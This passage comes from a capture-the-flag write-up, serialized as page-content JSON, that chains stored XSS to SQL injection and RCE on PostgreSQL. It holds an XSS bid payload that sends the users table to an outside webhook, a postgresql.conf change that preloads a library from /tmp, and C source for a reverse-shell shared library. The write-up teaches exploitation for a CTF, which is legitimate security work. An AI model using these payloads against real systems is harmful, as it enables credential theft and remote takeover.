06},[8118],{"type":38,"value":7584},{"type":33,"tag":128,"props":8120,"children":8121},{"style":312},[8122],{"type":38,"value":5815},{"type":33,"tag":128,"props":8124,"children":8125},{"class":130,"line":739},[8126,8131,8136,8140],{"type":33,"tag":128,"props":8127,"children":8128},{"style":135},[8129],{"type":
38,"value":8130},"setTimeout",{"type":33,"tag":128,"props":8132,"children":8133},{"style":312},[8134],{"type":38,"value":8135},"(()",{"type":33,"tag":128,"props":8137,"children":8138},{"style":312},[8139],{"type":38,"value":5625},{"type":33,"tag":128,"props":8141,"children":8142},{"style":312},[8143],{"type":38,"value":762},{"type":33,"tag":128,"props":8145,"children":8146},{"class":130,"line":765},[8147,8152,8156,8160,8164,8168,8172,8176,8180,8184,8188,8192,8196,8200,8204,8208,8212,8216,8221,8226,8231,8235],{"type":33,"tag":128,"props":8148,"children":8149},{"style":306},[8150],{"type":38,"value":8151},"  document",{"type":33,"tag":128,"props":8153,"children":8154},{"style":312},[8155],{"type":38,"value":215},{"type":33,"tag":128,"props":8157,"children":8158},{"style":135},[8159],{"type":38,"value":7764},{"type":33,"tag":128,"props":8161,"children":8162},{"style":312},[8163],{"type":38,"value":5566},{"type":33,"tag":128,"props":8165,"children":8166},{"style":676},[8167],{"type":38,"value":6040},{"type":33,"tag":128,"props":8169,"children":8170},{"style":140},[8171],{"type":38,"value":7584},{"type":33,"tag":128,"props":8173,"children":8174},{"style":676},[8175],{"type":38,"value":6040},{"type":33,"tag":128,"props":8177,"children":8178},{"style":312},[8179],{"type":38,"value":6700},{"type":33,"tag":128,"props":8181,"children":8182},{"style":306},[8183],{"type":38,"value":7789},{"type":33,"tag":128,"props":8185,"children":8186},{"style":312},[8187],{"type":38,"value":215},{"type":33,"tag":128,"props":8189,"children":8190},{"style":306},[8191],{"type":38,"value":7695},{"type":33,"tag":128,"props":8193,"children":8194},{"style":312},[8195],{"type":38,"value":215},{"type":33,"tag":128,"props":8197,"children":8198},{"style":135},[8199],{"type":38,"value":7806},{"type":33,"tag":128,"props":8201,"children":8202},{"style":312},[8203],{"type":38,"value":5566},{"type":33,"tag":128,"props":8205,"children":8206},{"style":676},[8207],{"type":38,"value":6040},{"type":33,"tag":128,
"props":8209,"children":8210},{"style":140},[8211],{"type":38,"value":243},{"type":33,"tag":128,"props":8213,"children":8214},{"style":676},[8215],{"type":38,"value":6040},{"type":33,"tag":128,"props":8217,"children":8218},{"style":312},[8219],{"type":38,"value":8220},")[",{"type":33,"tag":128,"props":8222,"children":8223},{"style":523},[8224],{"type":38,"value":8225},"3",{"type":33,"tag":128,"props":8227,"children":8228},{"style":312},[8229],{"type":38,"value":8230},"].",{"type":33,"tag":128,"props":8232,"children":8233},{"style":135},[8234],{"type":38,"value":7852},{"type":33,"tag":128,"props":8236,"children":8237},{"style":312},[8238],{"type":38,"value":7857},{"type":33,"tag":128,"props":8240,"children":8241},{"class":130,"line":804},[8242,8247,8251,8255],{"type":33,"tag":128,"props":8243,"children":8244},{"style":135},[8245],{"type":38,"value":8246},"  setTimeout",{"type":33,"tag":128,"props":8248,"children":8249},{"style":312},[8250],{"type":38,"value":8135},{"type":33,"tag":128,"props":8252,"children":8253},{"style":312},[8254],{"type":38,"value":5625},{"type":33,"tag":128,"props":8256,"children":8257},{"style":312},[8258],{"type":38,"value":762},{"type":33,"tag":128,"props":8260,"children":8261},{"class":130,"line":839},[8262,8267,8271,8276,8280,8284,8289,8293,8298,8303,8307,8311,8315,8319,8323,8327,8331,8335,8339,8343,8347,8351,8355,8359,8363,8367,8371,8375,8379,8383,8387,8392],{"type":33,"tag":128,"props":8263,"children":8264},{"style":306},[8265],{"type":38,"value":8266},"    
window",{"type":33,"tag":128,"props":8268,"children":8269},{"style":312},[8270],{"type":38,"value":215},{"type":33,"tag":128,"props":8272,"children":8273},{"style":306},[8274],{"type":38,"value":8275},"location",{"type":33,"tag":128,"props":8277,"children":8278},{"style":312},[8279],{"type":38,"value":5657},{"type":33,"tag":128,"props":8281,"children":8282},{"style":676},[8283],{"type":38,"value":6739},{"type":33,"tag":128,"props":8285,"children":8286},{"style":140},[8287],{"type":38,"value":8288},"//\u003CWEBHOOK>/?userstable=",{"type":33,"tag":128,"props":8290,"children":8291},{"style":676},[8292],{"type":38,"value":6040},{"type":33,"tag":128,"props":8294,"children":8295},{"style":300},[8296],{"type":38,"value":8297}," +",{"type":33,"tag":128,"props":8299,"children":8300},{"style":135},[8301],{"type":38,"value":8302}," btoa",{"type":33,"tag":128,"props":8304,"children":8305},{"style":312},[8306],{"type":38,"value":5566},{"type":33,"tag":128,"props":8308,"children":8309},{"style":306},[8310],{"type":38,"value":7695},{"type":33,"tag":128,"props":8312,"children":8313},{"style":312},[8314],{"type":38,"value":215},{"type":33,"tag":128,"props":8316,"children":8317},{"style":135},[8318],{"type":38,"value":7764},{"type":33,"tag":128,"props":8320,"children":8321},{"style":312},[8322],{"type":38,"value":5566},{"type":33,"tag":128,"props":8324,"children":8325},{"style":676},[8326],{"type":38,"value":6040},{"type":33,"tag":128,"props":8328,"children":8329},{"style":140},[8330],{"type":38,"value":7584},{"type":33,"tag":128,"props":8332,"children":8333},{"style":676},[8334],{"type":38,"value":6040},{"type":33,"tag":128,"props":8336,"children":8337},{"style":312},[8338],{"type":38,"value":6700},{"type":33,"tag":128,"props":8340,"children":8341},{"style":306},[8342],{"type":38,"value":7789},{"type":33,"tag":128,"props":8344,"children":8345},{"style":312},[8346],{"type":38,"value":215},{"type":33,"tag":128,"props":8348,"children":8349},{"style":306},[8350],{"type":38,"value":7695}
,{"type":33,"tag":128,"props":8352,"children":8353},{"style":312},[8354],{"type":38,"value":215},{"type":33,"tag":128,"props":8356,"children":8357},{"style":306},[8358],{"type":38,"value":5671},{"type":33,"tag":128,"props":8360,"children":8361},{"style":312},[8362],{"type":38,"value":215},{"type":33,"tag":128,"props":8364,"children":8365},{"style":135},[8366],{"type":38,"value":7764},{"type":33,"tag":128,"props":8368,"children":8369},{"style":312},[8370],{"type":38,"value":5566},{"type":33,"tag":128,"props":8372,"children":8373},{"style":676},[8374],{"type":38,"value":6040},{"type":33,"tag":128,"props":8376,"children":8377},{"style":140},[8378],{"type":38,"value":7961},{"type":33,"tag":128,"props":8380,"children":8381},{"style":676},[8382],{"type":38,"value":6040},{"type":33,"tag":128,"props":8384,"children":8385},{"style":312},[8386],{"type":38,"value":6700},{"type":33,"tag":128,"props":8388,"children":8389},{"style":306},[8390],{"type":38,"value":8391},"innerHTML",{"type":33,"tag":128,"props":8393,"children":8394},{"style":312},[8395],{"type":38,"value":2427},{"type":33,"tag":128,"props":8397,"children":8398},{"class":130,"line":848},[8399,8404,8409],{"type":33,"tag":128,"props":8400,"children":8401},{"style":312},[8402],{"type":38,"value":8403},"  },",{"type":33,"tag":128,"props":8405,"children":8406},{"style":523},[8407],{"type":38,"value":8408}," 1000",{"type":33,"tag":128,"props":8410,"children":8411},{"style":312},[8412],{"type":38,"value":5815},{"type":33,"tag":128,"props":8414,"children":8415},{"class":130,"line":976},[8416,8421,8425],{"type":33,"tag":128,"props":8417,"children":8418},{"style":312},[8419],{"type":38,"value":8420},"},",{"type":33,"tag":128,"props":8422,"children":8423},{"style":523},[8424],{"type":38,"value":8408},{"type":33,"tag":128,"props":8426,"children":8427},{"style":312},[8428],{"type":38,"value":5815},{"type":33,"tag":47,"props":8430,"children":8431},{},[8432],{"type":38,"value":8433},"To more easily trigger our payload, we will 
encode it in base64 and evaluate it using the eval function. We can then send it and add it to a bid like this:",{"type":33,"tag":114,"props":8435,"children":8436},{"lang":1561},[8437],{"type":33,"tag":119,"props":8438,"children":8440},{"className":1565,"code":8439,"language":1561,"meta":8,"style":8},"POST /api/auctions/2/bids HTTP/1.1\nHost: localhost:1337\nContent-Type: application/json\nContent-Length: 58\nCookie: connect.sid=s%3Ax4FJPG0GiAqVrYpH8ASKbI918wBmEvWK.us61E3liqERw6yg23%2FzUcPRMpqUNW6gk3kgbTTJsK2s\n\n{\"bid\":{\"length\":1,\"o\":\"a'>\u003Cimg src=x onerror='eval(atob(`bGV0IGlmcmFtZSA9[..SNIP..]pOw==`))'>'>\" }}\n",[8441],{"type":33,"tag":105,"props":8442,"children":8443},{"__ignoreMap":8},[8444,8468,8479,8490,8501,8512,8519],{"type":33,"tag":128,"props":8445,"children":8446},{"class":130,"line":131},[8447,8451,8456,8460,8464],{"type":33,"tag":128,"props":8448,"children":8449},{"style":1576},[8450],{"type":38,"value":1406},{"type":33,"tag":128,"props":8452,"children":8453},{"style":323},[8454],{"type":38,"value":8455}," /api/auctions/2/bids 
",{"type":33,"tag":128,"props":8457,"children":8458},{"style":1576},[8459],{"type":38,"value":7362},{"type":33,"tag":128,"props":8461,"children":8462},{"style":323},[8463],{"type":38,"value":7367},{"type":33,"tag":128,"props":8465,"children":8466},{"style":523},[8467],{"type":38,"value":7372},{"type":33,"tag":128,"props":8469,"children":8470},{"class":130,"line":362},[8471,8475],{"type":33,"tag":128,"props":8472,"children":8473},{"style":1576},[8474],{"type":38,"value":1591},{"type":33,"tag":128,"props":8476,"children":8477},{"style":140},[8478],{"type":38,"value":7384},{"type":33,"tag":128,"props":8480,"children":8481},{"class":130,"line":403},[8482,8486],{"type":33,"tag":128,"props":8483,"children":8484},{"style":1576},[8485],{"type":38,"value":1630},{"type":33,"tag":128,"props":8487,"children":8488},{"style":140},[8489],{"type":38,"value":1635},{"type":33,"tag":128,"props":8491,"children":8492},{"class":130,"line":739},[8493,8497],{"type":33,"tag":128,"props":8494,"children":8495},{"style":1576},[8496],{"type":38,"value":1643},{"type":33,"tag":128,"props":8498,"children":8499},{"style":140},[8500],{"type":38,"value":7407},{"type":33,"tag":128,"props":8502,"children":8503},{"class":130,"line":765},[8504,8508],{"type":33,"tag":128,"props":8505,"children":8506},{"style":1576},[8507],{"type":38,"value":7415},{"type":33,"tag":128,"props":8509,"children":8510},{"style":140},[8511],{"type":38,"value":7420},{"type":33,"tag":128,"props":8513,"children":8514},{"class":130,"line":804},[8515],{"type":33,"tag":128,"props":8516,"children":8517},{"emptyLinePlaceholder":896},[8518],{"type":38,"value":899},{"type":33,"tag":128,"props":8520,"children":8521},{"class":130,"line":839},[8522,8526,8530,8534,8538,8542,8546,8550,8554,8558,8562,8566,8570,8574,8578,8582,8586,8591,8595],{"type":33,"tag":128,"props":8523,"children":8524},{"style":312},[8525],{"type":38,"value":7246},{"type":33,"tag":128,"props":8527,"children":8528},{"style":656},[8529],{"type":38,"value":669},{"type":33,"ta
g":128,"props":8531,"children":8532},{"style":437},[8533],{"type":38,"value":6634},{"type":33,"tag":128,"props":8535,"children":8536},{"style":656},[8537],{"type":38,"value":669},{"type":33,"tag":128,"props":8539,"children":8540},{"style":312},[8541],{"type":38,"value":7263},{"type":33,"tag":128,"props":8543,"children":8544},{"style":656},[8545],{"type":38,"value":669},{"type":33,"tag":128,"props":8547,"children":8548},{"style":437},[8549],{"type":38,"value":6643},{"type":33,"tag":128,"props":8551,"children":8552},{"style":656},[8553],{"type":38,"value":669},{"type":33,"tag":128,"props":8555,"children":8556},{"style":312},[8557],{"type":38,"value":284},{"type":33,"tag":128,"props":8559,"children":8560},{"style":523},[8561],{"type":38,"value":7284},{"type":33,"tag":128,"props":8563,"children":8564},{"style":312},[8565],{"type":38,"value":5584},{"type":33,"tag":128,"props":8567,"children":8568},{"style":656},[8569],{"type":38,"value":669},{"type":33,"tag":128,"props":8571,"children":8572},{"style":437},[8573],{"type":38,"value":7297},{"type":33,"tag":128,"props":8575,"children":8576},{"style":656},[8577],{"type":38,"value":669},{"type":33,"tag":128,"props":8579,"children":8580},{"style":312},[8581],{"type":38,"value":284},{"type":33,"tag":128,"props":8583,"children":8584},{"style":676},[8585],{"type":38,"value":669},{"type":33,"tag":128,"props":8587,"children":8588},{"style":140},[8589],{"type":38,"value":8590},"a'>\u003Cimg src=x onerror='eval(atob(`bGV0IGlmcmFtZSA9[..SNIP..]pOw==`))'>'>",{"type":33,"tag":128,"props":8592,"children":8593},{"style":676},[8594],{"type":38,"value":669},{"type":33,"tag":128,"props":8596,"children":8597},{"style":312},[8598],{"type":38,"value":8599}," }}\n",{"type":33,"tag":47,"props":8601,"children":8602},{},[8603],{"type":38,"value":8604},"And finally call the bot on the page that has just been polluted with our XSS 
payload:",{"type":33,"tag":75,"props":8606,"children":8608},{"imgSrc":8607},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743110972/writeups/aurors-archive/send_to_bot.webp",[],{"type":33,"tag":47,"props":8610,"children":8611},{},[8612],{"type":38,"value":8613},"We can see that our webhook has received the passwords from the users table. We can now use the admin password to exploit the SQL injection.",{"type":33,"tag":75,"props":8615,"children":8618},{"imgSrc":8616,":width":8617},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1743111675/writeups/aurors-archive/collab_get_passwords.webp","800",[],{"type":33,"tag":40,"props":8620,"children":8622},{"id":8621},"sql-injection-to-rce",[8623],{"type":38,"value":8624},"SQL Injection to RCE",{"type":33,"tag":47,"props":8626,"children":8627},{},[8628],{"type":38,"value":8629},"In the first part, we saw that there was an SQL injection in the administration section. We also saw that the database is PostgreSQL 17, and the entrypoint shows that the application's database user is created with the SUPERUSER attribute.",{"type":33,"tag":114,"props":8631,"children":8632},{"lang":116},[8633],{"type":33,"tag":119,"props":8634,"children":8636},{"className":121,"code":8635,"language":116,"meta":8,"style":8},"[..SNIP..]\n# Set up database and create a new user (appuser) with complete access to appdb and the selected LO functions\necho \"[+] Setting up database and user...\"\nsu - postgres -c \"psql -v ON_ERROR_STOP=1 \u003C\u003CEOF\nDROP USER IF EXISTS appuser;\nCREATE USER appuser WITH PASSWORD '$APPUSER_PASSWORD' SUPERUSER;\nDROP DATABASE IF EXISTS appdb;\nCREATE DATABASE appdb OWNER appuser;\n\\c appdb\nGRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO appuser;\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO appuser;\nGRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO appuser;\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON SEQUENCES TO 
appuser;\nEOF\"\n[..SNIP..]\n",[8637],{"type":33,"tag":105,"props":8638,"children":8639},{"__ignoreMap":8},[8640,8656,8664,8685,8717,8725,8733,8741,8749,8757,8765,8773,8781,8789,8801],{"type":33,"tag":128,"props":8641,"children":8642},{"class":130,"line":131},[8643,8647,8652],{"type":33,"tag":128,"props":8644,"children":8645},{"style":312},[8646],{"type":38,"value":344},{"type":33,"tag":128,"props":8648,"children":8649},{"style":323},[8650],{"type":38,"value":8651},"..SNIP..",{"type":33,"tag":128,"props":8653,"children":8654},{"style":312},[8655],{"type":38,"value":3262},{"type":33,"tag":128,"props":8657,"children":8658},{"class":130,"line":362},[8659],{"type":33,"tag":128,"props":8660,"children":8661},{"style":5541},[8662],{"type":38,"value":8663},"# Set up database and create a new user (appuser) with complete access to appdb and the selected LO functions\n",{"type":33,"tag":128,"props":8665,"children":8666},{"class":130,"line":403},[8667,8672,8676,8681],{"type":33,"tag":128,"props":8668,"children":8669},{"style":437},[8670],{"type":38,"value":8671},"echo",{"type":33,"tag":128,"props":8673,"children":8674},{"style":676},[8675],{"type":38,"value":679},{"type":33,"tag":128,"props":8677,"children":8678},{"style":140},[8679],{"type":38,"value":8680},"[+] Setting up database and user...",{"type":33,"tag":128,"props":8682,"children":8683},{"style":676},[8684],{"type":38,"value":836},{"type":33,"tag":128,"props":8686,"children":8687},{"class":130,"line":739},[8688,8693,8698,8703,8708,8712],{"type":33,"tag":128,"props":8689,"children":8690},{"style":135},[8691],{"type":38,"value":8692},"su",{"type":33,"tag":128,"props":8694,"children":8695},{"style":140},[8696],{"type":38,"value":8697}," -",{"type":33,"tag":128,"props":8699,"children":8700},{"style":140},[8701],{"type":38,"value":8702}," postgres",{"type":33,"tag":128,"props":8704,"children":8705},{"style":151},[8706],{"type":38,"value":8707}," 
-c",{"type":33,"tag":128,"props":8709,"children":8710},{"style":676},[8711],{"type":38,"value":679},{"type":33,"tag":128,"props":8713,"children":8714},{"style":140},[8715],{"type":38,"value":8716},"psql -v ON_ERROR_STOP=1 \u003C\u003CEOF\n",{"type":33,"tag":128,"props":8718,"children":8719},{"class":130,"line":765},[8720],{"type":33,"tag":128,"props":8721,"children":8722},{"style":140},[8723],{"type":38,"value":8724},"DROP USER IF EXISTS appuser;\n",{"type":33,"tag":128,"props":8726,"children":8727},{"class":130,"line":804},[8728],{"type":33,"tag":128,"props":8729,"children":8730},{"style":140},[8731],{"type":38,"value":8732},"CREATE USER appuser WITH PASSWORD '$APPUSER_PASSWORD' SUPERUSER;\n",{"type":33,"tag":128,"props":8734,"children":8735},{"class":130,"line":839},[8736],{"type":33,"tag":128,"props":8737,"children":8738},{"style":140},[8739],{"type":38,"value":8740},"DROP DATABASE IF EXISTS appdb;\n",{"type":33,"tag":128,"props":8742,"children":8743},{"class":130,"line":848},[8744],{"type":33,"tag":128,"props":8745,"children":8746},{"style":140},[8747],{"type":38,"value":8748},"CREATE DATABASE appdb OWNER appuser;\n",{"type":33,"tag":128,"props":8750,"children":8751},{"class":130,"line":976},[8752],{"type":33,"tag":128,"props":8753,"children":8754},{"style":140},[8755],{"type":38,"value":8756},"\\c appdb\n",{"type":33,"tag":128,"props":8758,"children":8759},{"class":130,"line":988},[8760],{"type":33,"tag":128,"props":8761,"children":8762},{"style":140},[8763],{"type":38,"value":8764},"GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO appuser;\n",{"type":33,"tag":128,"props":8766,"children":8767},{"class":130,"line":1001},[8768],{"type":33,"tag":128,"props":8769,"children":8770},{"style":140},[8771],{"type":38,"value":8772},"ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON TABLES TO 
appuser;\n",{"type":33,"tag":128,"props":8774,"children":8775},{"class":130,"line":1014},[8776],{"type":33,"tag":128,"props":8777,"children":8778},{"style":140},[8779],{"type":38,"value":8780},"GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO appuser;\n",{"type":33,"tag":128,"props":8782,"children":8783},{"class":130,"line":1026},[8784],{"type":33,"tag":128,"props":8785,"children":8786},{"style":140},[8787],{"type":38,"value":8788},"ALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT ALL PRIVILEGES ON SEQUENCES TO appuser;\n",{"type":33,"tag":128,"props":8790,"children":8791},{"class":130,"line":1038},[8792,8797],{"type":33,"tag":128,"props":8793,"children":8794},{"style":140},[8795],{"type":38,"value":8796},"EOF",{"type":33,"tag":128,"props":8798,"children":8799},{"style":676},[8800],{"type":38,"value":836},{"type":33,"tag":128,"props":8802,"children":8803},{"class":130,"line":1051},[8804,8808,8812],{"type":33,"tag":128,"props":8805,"children":8806},{"style":312},[8807],{"type":38,"value":344},{"type":33,"tag":128,"props":8809,"children":8810},{"style":323},[8811],{"type":38,"value":8651},{"type":33,"tag":128,"props":8813,"children":8814},{"style":312},[8815],{"type":38,"value":3262},{"type":33,"tag":47,"props":8817,"children":8818},{},[8819,8821,8828],{"type":38,"value":8820},"With a superuser account, it is then possible to use large objects. Briefly, large objects are a PostgreSQL type that allows storing larger quantities of data than classical types like text or bytea. The large-object functions also allow reading from and writing to the server's filesystem. 
If you want to see another writeup dealing with PostgreSQL large objects, you can check out the one I made on a ",{"type":33,"tag":53,"props":8822,"children":8825},{"href":8823,"rel":8824},"https://owalid.com/writeups/chatter-box#from-postgresqli-to-rce-unintended",[57],[8826],{"type":38,"value":8827},"RealWorldCTF 2024 Chatter-box",{"type":38,"value":215},{"type":33,"tag":47,"props":8830,"children":8831},{},[8832],{"type":38,"value":8833},"Basically, with a database account that can use large objects, it is quite simple to achieve RCE using nothing more than SELECT statements.",{"type":33,"tag":47,"props":8835,"children":8836},{},[8837,8839,8845,8847,8853,8855,8861],{"type":38,"value":8838},"The PostgreSQL server reads its configuration from a file called ",{"type":33,"tag":105,"props":8840,"children":8842},{"className":8841},[],[8843],{"type":38,"value":8844},"postgresql.conf",{"type":38,"value":8846}," which is generally located in the home directory of the Unix user ",{"type":33,"tag":105,"props":8848,"children":8850},{"className":8849},[],[8851],{"type":38,"value":8852},"postgres",{"type":38,"value":8854},". 
Some configuration entries don't require a server restart for changes to take effect; it is enough to call the ",{"type":33,"tag":105,"props":8856,"children":8858},{"className":8857},[],[8859],{"type":38,"value":8860},"pg_reload_conf()",{"type":38,"value":8862}," function in an SQL query to reload them.",{"type":33,"tag":47,"props":8864,"children":8865},{},[8866],{"type":38,"value":8867},"Thanks to large objects, it is then possible to overwrite the configuration file with one that allows us to achieve RCE.",{"type":33,"tag":47,"props":8869,"children":8870},{},[8871],{"type":38,"value":8872},"Several techniques exist:",{"type":33,"tag":239,"props":8874,"children":8875},{},[8876,8895,8913],{"type":33,"tag":243,"props":8877,"children":8878},{},[8879,8885,8887,8894],{"type":33,"tag":105,"props":8880,"children":8882},{"className":8881},[],[8883],{"type":38,"value":8884},"ssl_passphrase_command",{"type":38,"value":8886}," (by ",{"type":33,"tag":53,"props":8888,"children":8891},{"href":8889,"rel":8890},"https://pulsesecurity.co.nz/articles/postgres-sqli",[57],[8892],{"type":38,"value":8893},"Denis 
Andzakovic",{"type":38,"value":2966},{"type":33,"tag":243,"props":8896,"children":8897},{},[8898,8904,8905,8912],{"type":33,"tag":105,"props":8899,"children":8901},{"className":8900},[],[8902],{"type":38,"value":8903},"archive_command",{"type":38,"value":8886},{"type":33,"tag":53,"props":8906,"children":8909},{"href":8907,"rel":8908},"https://thegrayarea.tech/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3",[57],[8910],{"type":38,"value":8911},"sylsTyping",{"type":38,"value":2966},{"type":33,"tag":243,"props":8914,"children":8915},{},[8916,8922,8923,8930],{"type":33,"tag":105,"props":8917,"children":8919},{"className":8918},[],[8920],{"type":38,"value":8921},"session_preload_libraries",{"type":38,"value":8886},{"type":33,"tag":53,"props":8924,"children":8927},{"href":8925,"rel":8926},"https://adeadfed.com/posts/postgresql-select-only-rce/",[57],[8928],{"type":38,"value":8929},"adeadfed",{"type":38,"value":2966},{"type":33,"tag":47,"props":8932,"children":8933},{},[8934,8936,8941],{"type":38,"value":8935},"At first, I tried to exploit it in the same way as during RealWorldCTF using the ",{"type":33,"tag":105,"props":8937,"children":8939},{"className":8938},[],[8940],{"type":38,"value":8884},{"type":38,"value":8942}," configuration, but the exploit didn't seem to work with the challenge configuration, so I focused on the configuration with the library.",{"type":33,"tag":114,"props":8944,"children":8946},{"lang":8945},"conf",[8947],{"type":33,"tag":119,"props":8948,"children":8951},{"className":8949,"code":8950,"language":8945,"meta":8,"style":8},"language-conf shiki shiki-themes vitesse-dark","# - Shared Library Preloading -\n\nsession_preload_libraries = 'payload.so'\n#shared_preload_libraries = ''      # (change requires restart)\n#jit_provider = 'llvmjit'       # JIT library to use\n\n# - Other Defaults -\n\ndynamic_library_path = '/tmp:$libdir'\n#gin_fuzzy_search_limit = 
0\n",[8952],{"type":33,"tag":105,"props":8953,"children":8954},{"__ignoreMap":8},[8955,8963,8970,8978,8986,8994,9001,9009,9016,9024],{"type":33,"tag":128,"props":8956,"children":8957},{"class":130,"line":131},[8958],{"type":33,"tag":128,"props":8959,"children":8960},{},[8961],{"type":38,"value":8962},"# - Shared Library Preloading -\n",{"type":33,"tag":128,"props":8964,"children":8965},{"class":130,"line":362},[8966],{"type":33,"tag":128,"props":8967,"children":8968},{"emptyLinePlaceholder":896},[8969],{"type":38,"value":899},{"type":33,"tag":128,"props":8971,"children":8972},{"class":130,"line":403},[8973],{"type":33,"tag":128,"props":8974,"children":8975},{},[8976],{"type":38,"value":8977},"session_preload_libraries = 'payload.so'\n",{"type":33,"tag":128,"props":8979,"children":8980},{"class":130,"line":739},[8981],{"type":33,"tag":128,"props":8982,"children":8983},{},[8984],{"type":38,"value":8985},"#shared_preload_libraries = ''      # (change requires restart)\n",{"type":33,"tag":128,"props":8987,"children":8988},{"class":130,"line":765},[8989],{"type":33,"tag":128,"props":8990,"children":8991},{},[8992],{"type":38,"value":8993},"#jit_provider = 'llvmjit'       # JIT library to use\n",{"type":33,"tag":128,"props":8995,"children":8996},{"class":130,"line":804},[8997],{"type":33,"tag":128,"props":8998,"children":8999},{"emptyLinePlaceholder":896},[9000],{"type":38,"value":899},{"type":33,"tag":128,"props":9002,"children":9003},{"class":130,"line":839},[9004],{"type":33,"tag":128,"props":9005,"children":9006},{},[9007],{"type":38,"value":9008},"# - Other Defaults -\n",{"type":33,"tag":128,"props":9010,"children":9011},{"class":130,"line":848},[9012],{"type":33,"tag":128,"props":9013,"children":9014},{"emptyLinePlaceholder":896},[9015],{"type":38,"value":899},{"type":33,"tag":128,"props":9017,"children":9018},{"class":130,"line":976},[9019],{"type":33,"tag":128,"props":9020,"children":9021},{},[9022],{"type":38,"value":9023},"dynamic_library_path = 
'/tmp:$libdir'\n",{"type":33,"tag":128,"props":9025,"children":9026},{"class":130,"line":988},[9027],{"type":33,"tag":128,"props":9028,"children":9029},{},[9030],{"type":38,"value":9031},"#gin_fuzzy_search_limit = 0\n",{"type":33,"tag":47,"props":9033,"children":9034},{},[9035,9037,9043,9045,9051,9053,9059],{"type":38,"value":9036},"Here our final RCE payload will be named ",{"type":33,"tag":105,"props":9038,"children":9040},{"className":9039},[],[9041],{"type":38,"value":9042},"payload.so",{"type":38,"value":9044}," and will be placed in the ",{"type":33,"tag":105,"props":9046,"children":9048},{"className":9047},[],[9049],{"type":38,"value":9050},"/tmp",{"type":38,"value":9052}," directory, which is added to the library search path by the ",{"type":33,"tag":105,"props":9054,"children":9056},{"className":9055},[],[9057],{"type":38,"value":9058},"dynamic_library_path",{"type":38,"value":9060}," entry.",{"type":33,"tag":47,"props":9062,"children":9063},{},[9064],{"type":38,"value":9065},"Our code that will need to be compiled is this:",{"type":33,"tag":114,"props":9067,"children":9068},{"lang":330},[9069],{"type":33,"tag":119,"props":9070,"children":9073},{"className":9071,"code":9072,"language":330,"meta":8,"style":8},"language-c shiki shiki-themes vitesse-dark","// payload.c\n#include \u003Cstdio.h>\n#include \u003Csys/socket.h>\n#include \u003Csys/types.h>\n#include \u003Cstdlib.h>\n#include \u003Cunistd.h>\n#include \u003Cnetinet/in.h>\n#include \u003Carpa/inet.h>\n#include \"postgres.h\"\n#include \"fmgr.h\"\n\n#ifdef PG_MODULE_MAGIC\nPG_MODULE_MAGIC;\n#endif\n\nvoid _init() {\n    /*\n        code taken from https://www.revshells.com/\n    */\n\n    int port = 9999;\n    struct sockaddr_in revsockaddr;\n\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\n    revsockaddr.sin_family = AF_INET;\n    revsockaddr.sin_port = htons(port);\n    revsockaddr.sin_addr.s_addr = inet_addr(\"[REDACTED]\");\n\n    connect(sockt, (struct sockaddr *) &revsockaddr,\n    sizeof(revsockaddr));\n    
dup2(sockt, 0);\n    dup2(sockt, 1);\n    dup2(sockt, 2);\n\n    char * const argv[] = {\"/bin/sh\", NULL};\n    execve(\"/bin/sh\", argv, NULL);\n}\n",[9074],{"type":33,"tag":105,"props":9075,"children":9076},{"__ignoreMap":8},[9077,9085,9112,9136,9160,9184,9208,9232,9256,9280,9304,9311,9328,9340,9352,9359,9381,9389,9397,9405,9412,9438,9455,9462,9514,9544,9582,9637,9644,9702,9723,9751,9779,9807,9814,9877,9921],{"type":33,"tag":128,"props":9078,"children":9079},{"class":130,"line":131},[9080],{"type":33,"tag":128,"props":9081,"children":9082},{"style":5541},[9083],{"type":38,"value":9084},"// payload.c\n",{"type":33,"tag":128,"props":9086,"children":9087},{"class":130,"line":362},[9088,9093,9098,9103,9108],{"type":33,"tag":128,"props":9089,"children":9090},{"style":312},[9091],{"type":38,"value":9092},"#",{"type":33,"tag":128,"props":9094,"children":9095},{"style":1576},[9096],{"type":38,"value":9097},"include",{"type":33,"tag":128,"props":9099,"children":9100},{"style":676},[9101],{"type":38,"value":9102}," 
\u003C",{"type":33,"tag":128,"props":9104,"children":9105},{"style":140},[9106],{"type":38,"value":9107},"stdio.h",{"type":33,"tag":128,"props":9109,"children":9110},{"style":676},[9111],{"type":38,"value":6097},{"type":33,"tag":128,"props":9113,"children":9114},{"class":130,"line":403},[9115,9119,9123,9127,9132],{"type":33,"tag":128,"props":9116,"children":9117},{"style":312},[9118],{"type":38,"value":9092},{"type":33,"tag":128,"props":9120,"children":9121},{"style":1576},[9122],{"type":38,"value":9097},{"type":33,"tag":128,"props":9124,"children":9125},{"style":676},[9126],{"type":38,"value":9102},{"type":33,"tag":128,"props":9128,"children":9129},{"style":140},[9130],{"type":38,"value":9131},"sys/socket.h",{"type":33,"tag":128,"props":9133,"children":9134},{"style":676},[9135],{"type":38,"value":6097},{"type":33,"tag":128,"props":9137,"children":9138},{"class":130,"line":739},[9139,9143,9147,9151,9156],{"type":33,"tag":128,"props":9140,"children":9141},{"style":312},[9142],{"type":38,"value":9092},{"type":33,"tag":128,"props":9144,"children":9145},{"style":1576},[9146],{"type":38,"value":9097},{"type":33,"tag":128,"props":9148,"children":9149},{"style":676},[9150],{"type":38,"value":9102},{"type":33,"tag":128,"props":9152,"children":9153},{"style":140},[9154],{"type":38,"value":9155},"sys/types.h",{"type":33,"tag":128,"props":9157,"children":9158},{"style":676},[9159],{"type":38,"value":6097},{"type":33,"tag":128,"props":9161,"children":9162},{"class":130,"line":765},[9163,9167,9171,9175,9180],{"type":33,"tag":128,"props":9164,"children":9165},{"style":312},[9166],{"type":38,"value":9092},{"type":33,"tag":128,"props":9168,"children":9169},{"style":1576},[9170],{"type":38,"value":9097},{"type":33,"tag":128,"props":9172,"children":9173},{"style":676},[91